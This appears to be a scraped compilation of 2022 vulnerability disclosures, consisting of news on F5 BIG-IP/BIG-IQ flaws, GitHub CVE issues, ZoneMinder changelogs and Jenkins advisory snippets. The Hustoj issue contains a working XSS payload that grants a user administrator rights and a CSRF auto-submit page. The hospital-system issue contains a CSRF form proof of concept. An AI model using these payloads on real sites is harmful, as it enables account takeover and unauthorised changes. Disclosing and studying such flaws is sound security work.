Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.
Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.
The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.

Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints.

The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

*   **CVE-2022-41622** (CVSS score: 8.8) - A cross-site request forgery (CSRF) vulnerability through iControl SOAP, leading to unauthenticated remote code execution.
*   **CVE-2022-41800** (CVSS score: 8.7) - An iControl REST vulnerability that could allow an authenticated user with an Administrator role to bypass Appliance mode restrictions.

"By successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing)," Rapid7 researcher Ron Bowes said.

However, it's worth noting that such an exploit requires an administrator with an active session to visit a hostile website.

Also identified were three different instances of security bypass, which F5 said cannot be exploited without first breaking existing security barriers through a previously undocumented mechanism.

Should such a scenario arise, an adversary with Advanced Shell (bash) access to the appliance could weaponize these weaknesses to execute arbitrary system commands, create or delete files, or disable services.

While F5 has made no mention of any of the vulnerabilities being exploited in attacks, it's recommended that users apply the necessary patches to mitigate potential risks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.

**描述问题**  
XSS Vulnerability exists in  

echo $row\['input\_text'\]."\\n";

  
**如何复现**  
Steps to reproduce the behavior:

1.  POST text with xss script to submit.php  
    for example:

id=-1000&language=1&source=asdasdasdasdasd&input\_text=<script src\="/template/bs3/jquery.min.js"\></script\><script\>$.get("/admin/privilege\_add.php").done(function(data){
    re\=/name="postkey" value="(\[\\w\]%2B?)"/g;
    $.post("/admin/privilege\_add.php",{"postkey":re.exec(data)\[1\],"user\_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script\>

Then you can get a sid.  

2.  Send malicious links to administrators  
    example:

<body\>
<script type\="text/javascript"\>
    function post(URL, PARAMS) {
    var temp \= document.createElement("form");
    temp.action \= URL;
    temp.method \= "post";
    temp.style.display \= "none";
    for (var x in PARAMS) {
        var opt \= document.createElement("textarea");
        opt.name \= x;
        opt.value \= PARAMS\[x\];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem\_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script\>
</body\>

CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj

Doufox 0.0.4 contains a CSRF vulnerability that can add system administrator account.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-42246: CSRF vulnerability adding system administrator account · Issue #1 · farliy-hacker/Doufoxcms

Widespread exploitation deemed ‘unlikely’ given hurdles

Adam Bannister 16 November 2022 at 15:02 UTC  
Updated: 16 November 2022 at 15:06 UTC

Widespread exploitation deemed ‘unlikely’ given hurdles

Security vendor F5 has prepared hotfixes for a pair of vulnerabilities affecting its BIG-IP and BIG-IQ networking devices that could result in remote code execution (RCE).

Software updates containing patches are also in the pipeline for the bugs, which despite potentially severe outcomes have significant barriers to exploitation.

F5 has assigned the most severe of the flaws a ‘high’ severity CVSS score of 8.8, but Rapid7 said this isn’t a “drop everything to fix” situation.

**CSRF to RCE**

The vulnerability (CVE-2022-41622) leaves BIG-IP and BIG-IQ vulnerable to unauthenticated RCE via cross-site request forgery (CSRF) because Big-IP’s SOAP API lacked CSRF protection and other typical SOAP API defenses, according to a blog post published today (November 16) by Ron Bowes, lead security researcher at Rapid7.

The attack “can grant persistent root access to the device’s management interface”, even when this interface is not internet-facing (as is recommended).

However, “that requires a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network)”, said Bowes.

Read more of the latest enterprise security news

If these prerequisites are met, miscreants can make arbitrary SOAP commands against the API within the authenticated user’s session.

Bowes, who uncovered the flaws, said “several of the exploit paths require SELinux bypasses” – which he duly found.

The second issue, tracked as CVE-2022-41800, means iControl REST is vulnerable to RCE via RPM spec injection. However, Bowes considers the risk “low” given iControl REST is only vulnerable in appliance mode and attackers must be authenticated as administrators.

**Exploit chain**

Bowes also uncovered a trio of security control bypasses “that F5 does not consider vulnerabilities” but nevertheless have “a reasonable attack surface” for use as part of an exploit chain.

He said F5 had addressed a SELinux bypass arising through command injection in an update script but declined to assign a CVE.

“We disagree with their assessment because SELinux is a security boundary,” said Bowes.

“We’d normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.”

Bowes also found a SELinux bypass via incorrect file context and a local privilege escalation via inadequate UNIX socket permissions.

RECOMMENDED BIG-IP: Proof-of-concept released for RCE vulnerability in F5 network management tool

F5 told The Daily Swig:  

“As noted by Rapid7, there is no known way to exploit these issues without first bypassing existing security controls using an unknown or undiscovered mechanism. We know of no way in which an attacker would be able to take advantage of these issues at this time and therefore do not consider them vulnerabilities and did not issue CVEs.

“F5 is evaluating these issues as part of a defense-in-depth approach and will look to address them in future releases. We recommend customers adhere to security best practices to reduce any risk should design or threat models change in the future.”

**Hotfixes, patches**

F5 added: “We recommend customers check the security advisories on AskF5 to assess their exposure and get details on recommended mitigations. Engineering hotfixes are available on request for both CVEs, and these fixes will be included in future releases as quickly as possible.” 

At the time of disclosure, F5 is apparently not aware of any active exploitation of the vulnerabilities. Rapid7 believes “widespread exploitation” is “unlikely”.

DON’T MISS Zendesk Explore flaws opened the door to account pillage

F5 fixes high severity RCE bug in BIG-IP, BIG-IQ devices

A vulnerability classified as problematic was found in Hospital Management Center. Affected by this vulnerability is an unknown functionality of the file appointment.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213787.

**Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4****1.Vulnerability analysis**

On the page appointment. php, the input information is submitted to the appointment connect. php through the POST request. The follow-up code is displayed in the appointment connect PHP page, the 16th line of code - the 29th line of code, the information entered by the user is assigned to the corresponding variable, and then inserted into the database, and the program judges if mysqli\_ If the query is executed successfully, the data is successfully inserted into the database.
The user login status is not verified, so CSRF vulnerability is caused

POC:

<html\>
  
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://vulhms.test/appointmentconnect.php" method\="POST"\>
      <input type\="hidden" name\="Patient&#95;Name" value\="ace" />
      <input type\="hidden" name\="Doctor&#95;Name" value\="ace" />
      <input type\="hidden" name\="Department" value\="ace" />
      <input type\="hidden" name\="App&#95;Date" value\="2022-11-15" />
      <input type\="hidden" name\="App&#95;Time" value\="00:00:00.000000" />
      <input type\="hidden" name\="Phone" value\="ace" />
      <input type\="hidden" name\="save" value\="submit" />
      <input type\="submit" value\="Submit request" />
    </form\>
  </body\>
</html\>

The POC clicks Send, and then a piece of information about the user's ace will be added to the database

In the docker list interface, we can also see that a new West Sydney user named ace has been added

CVE-2022-4013: CSRF vulnerability · Issue #2 · golamsarwar08/hms

Session fixation exists in ZoneMinder through 1.36.12 as an attacker can poison a session cookie to the next logged-in user.

**The Memory Remains 1.36.31**

**Changes since 1.36.30**

*   Fix failed login due to remoteAddr not being populated in session after regeneration
*   Use REQUEST instead of SESSION to store the post login redirect because we clear the session on login. Fixes \[#3517\]
*   Turn off logging of deprecation notices so that we work with php8.2

**Full Changelog**: 1.36.30...1.36.31

**The Memory Remains 1.36.30**

**What's Changed**

*   Test for definition of ZM\_LOG\_INJECT. We don't include the config when not logged in. So it won't be defined and an error will be logged
*   Fix saving from the function modal (and other modals)
*   left align option value column
*   when a config value is overridden via \*.conf files, put up a warning/explanation on the options view
*   Turn failure to send into a debug instead of warn. When running under fpm etc we may not get SIGPIPE.
*   Move relevant code out of includes/actions/auth.php into includs/auth.php. Fixes inability to login using GET method.
*   Don't panic if no font file found. We seem to be able to continue without it.
*   Rework session handling to fix breakage with php8.2. Please note that php 8.2 still completely breaks a ton of our code. Do not upgrade to php8.2 and expect ZoneMinder to work.

**Full Changelog**: 1.36.29...1.36.30

**The Memory Remains 1.36.29**

#Changes since 1.36.28

*   update web/ajax.log.php to contents from master. Fixes errors causing log view to not work. Fixes \[#3606\]
*   use ajax() instead of getJSON so that we can specify no timeouts.. This prevents log queries from stacking up overloading the db
*   Check for definition of CAMBOZOLA defines. The purpose is just to ease running the 1.36 UI against a 1.37 database.
*   Added option ZM\_AUTH\_CASE\_INSENSITIVE\_USERNAMES to match mixed case Usernames to lower case usernames in database \[#3516\]
*   Move LIBAVCODEC\_VERSION\_CHECK so that it is defined when the include files are under ffmpeg. Maybe fixes build with 5.1.2?
*   Test for matches\[operator\]. Fixes \[#3607\]

**Full Changelog**: 1.36.28...1.36.29

**The Memory Remains 1.36.28**

#Changes since 1.36.27

*   Add ZM\_LOG\_INJECT config parameter to disable unprivileged log injection through api.
*   Check value of System:Edit permission and ZM\_LOG\_INJECT to disable ajax log injection.
*   Use canEdit\['System'\] and value of new ZM\_LOG\_INJECT to disable attempting to inject javascript errors into zm logs
*   The above 3 Fixes GHSA-cfcx-v52x-jh74
*   Fix Monitor => monitor in zmwatch causing crash in zmwatch
*   update storage modal to fix buttons not being in form. Also remove duplicate view field and make button action be save instead of Save. Fixes \[#3605\]

**Full Changelog**: 1.36.27...1.36.28

**The Memory Remains 1.36.27**

#Changes since 1.36.26

*   Use zm\_setcookie, which will automatically set samesite on the session cookie. Maybe fixes \[#3517\]
*   commit to free up locks when there is an error doing MoveTo (like does not exist on disk). Also remove commit from CopyTo which does no transactions/locking.
*   Use y instead of Y for path generation when using Deep scheme. Fixes \[#3583\]
*   Add spans and title attributes on the title h2 parts of frame view so that on mouseover it tells you what the numbers are
*   Update frame view js to use const etc instead of var. Put back EventId and FrameId in stats being links and fix FrameId not being populated. If no stats available disable the stats button and use the title to explain why.
*   In failure state populate imageData array to reduce output php errors in frame view
*   Add connkey and semaphore key to logging about failure to get semaphore. Add sem\_release before every ajaxError call because ajaxError exits and so we never release the semaphore.
*   fix not saving v4l settings.
*   Only warn about event exceeding section\_length if we are not using close\_mode=TIME. Fixes \[#3599\]
*   make OutputCodec work in API Maybe fixes \[#3341\]
*   Handle filter\[query\] not being defined
*   Fix export not working for filter due to limit set to 0.
*   Only look for action if there is a view. Prevents lookup of a non-existent file.
*   Include monitor Id in zmwatch logs, for consistency as well as utility
*   Escape File parameters when inserting log to prevent XSS. Related to fixing \[#2466\]. Fixes https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h6xp-cvwv-q433
*   Only perform actions on post. Doing them on GET allows doing actions without CSRF from things like img tags which is not good. Fixes GHSA-xgv6-qv6c-399q
*   Upgrade jquery to 3.6.1
*   Update jquery-ui to 1.13.2 to remove reported dependency advisory
*   Fix missing STATE\_UNKNOWN in perl libs causing missed events in zmes.
*   Add permissions checking to API/Logs. Fixes unprivileged user being to add/edit/delete/view logs. Fixes GHSA-mpcx-3gvh-9488

**Full Changelog**: 1.36.26...1.36.27

**The Memory Remains 1.36.26**

#Changes since 1.36.25

*   Fix \[#3580\] Export page broken due to type on dateTimeFormater => dateTimeFormatter
*   Restore the integer value returned for status on API MonitorsController to per 1.36.16 value. The values got shifted due to making 0 = Unknown instead of -1.
*   Only init the bootstrap table of events on watch view if the user has permission to view events. This prevents endless logging of insufficient permissions errors.
*   Add fade to the logout modal which for some reason fixes it not showing after a cancel
*   Specify that only main page content tables should have the first column be min-width: 300px. This was affecting the logout dialog table content when viewing the monitor edit view.
*   fix export from event view
*   Only try to set TIMEZONE when loading dateTimeFormatter if it is set and handle the exception when any of TIMEZONE or LOCALE are invalid.
*   Fix values in LOCALE\_DEFAULT dropdown in options.
*   Add libio-interface-perl to dependencies. Fixes \[#3577\]
*   Show the Reboot control when it is enabled without wake, sleep or reset.

**Full Changelog**: 1.36.25...1.36.26

**The Memory Remains 1.36.25**

**Changes since 1.36.24**

*   add build for ubuntu kinetic
*   fix javascript error on zone edit
*   fix deprecation error on php8 due to implicit conversion to integer when displaying event duration
*   Update ZM\_MIN\_RTSP\_PORT description
*   fix some javascript errors during page transition
*   Ignore errors when decoding log message
*   add detection of out of order packets from ffmpeg
*   Keep track of max\_keyframe\_interval and log it when complaining
*   fix hang during logrotate due to waiting in packetqueue for decode
*   Remove warning about maxImageBuffer. Will be handled better in queuePacket.
*   Fix snapshot jpeg not being created early enough
*   finally fix (we think) hung zmu/zms processes due to race in db thread creation.
*   Update material icons to v1.11.10
*   Add a button to event view to jump to this event time in montage review
*   fix different button heights when using font awesome vs material icons
*   Add a back to frames button from frame view
*   Use HTTP\_X\_FORWARDED\_HOST or HTTP\_X\_FORWARDED\_SERVER if present to get correct hostname to use when behind a reverse proxy.
*   Handle case where time\_base is not set in the codec. Fixes h265 not playing through zms
*   When there are less than 3 storage areas, just list them in the header instead of making it a dropdown
*   fix problems with migrateHash

**Full Changelog**: 1.36.24...1.36.25

**The Memory Remains 1.36.24**

**The Memory Remains 1.36.23**

**WARNING: This release is flawed. Do not use. 1.36.24 is coming soon.**

**Changes since 1.36.22**

*   Fix failed build
*   set timezone when initializing IntlDateFormatter

**Full Changelog**: 1.36.22...1.36.23

**The Memory Remains 1.36.22**

**WARNING: This release is flawed. It will not compile. Do not use. 1.36.24 is coming soon.**

**Changes since 1.36.21**

*   Make proportional zoom and movement work for AxisV2 API
*   remove padding from ptz buttons making proportional zoom/pan not work right
*   Fix memleak
*   reduce debugging calls
*   include reorder\_queue\_size setting in warning about out of order dts
*   Sync up with c++ shm alignment to fix same size on 32bit
*   improve warning about MaxImageBuffer size being smaller than keyframe interval
*   Fix ever increasing duration in event list
*   fix javascript console log about leaflet not being installed
*   Fix event listing for filter involving AlarmedZone rule.
*   Fix logic inversion causing Filters involving DiskPercent rules to still hit the database
*   Fix too much logging about finding locked packets
*   Fix segfault when audio stream is present but not being recorded
*   when a new auth hash is generated, don't reload the image stream, just update the global var to be used if the image stream breaks.

**Full Changelog**: 1.36.21...1.36.22

CVE-2022-30769: Releases · ZoneMinder/zoneminder

Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45396: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins Cluster Statistics Plugin 0.4.6 and earlier allows attackers to delete recorded Jenkins Cluster Statistics.

CVE-2022-45399: Jenkins Security Advisory 2022-11-15

Jenkins Script Security Plugin 1189.vb_a_b_7c8fd5fde and earlier stores whole-script approvals as the SHA-1 hash of the script, making it vulnerable to collision attacks.

CVE-2022-45379: Jenkins Security Advisory 2022-11-15

Jenkins Violations Plugin 0.7.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

Tag

#csrf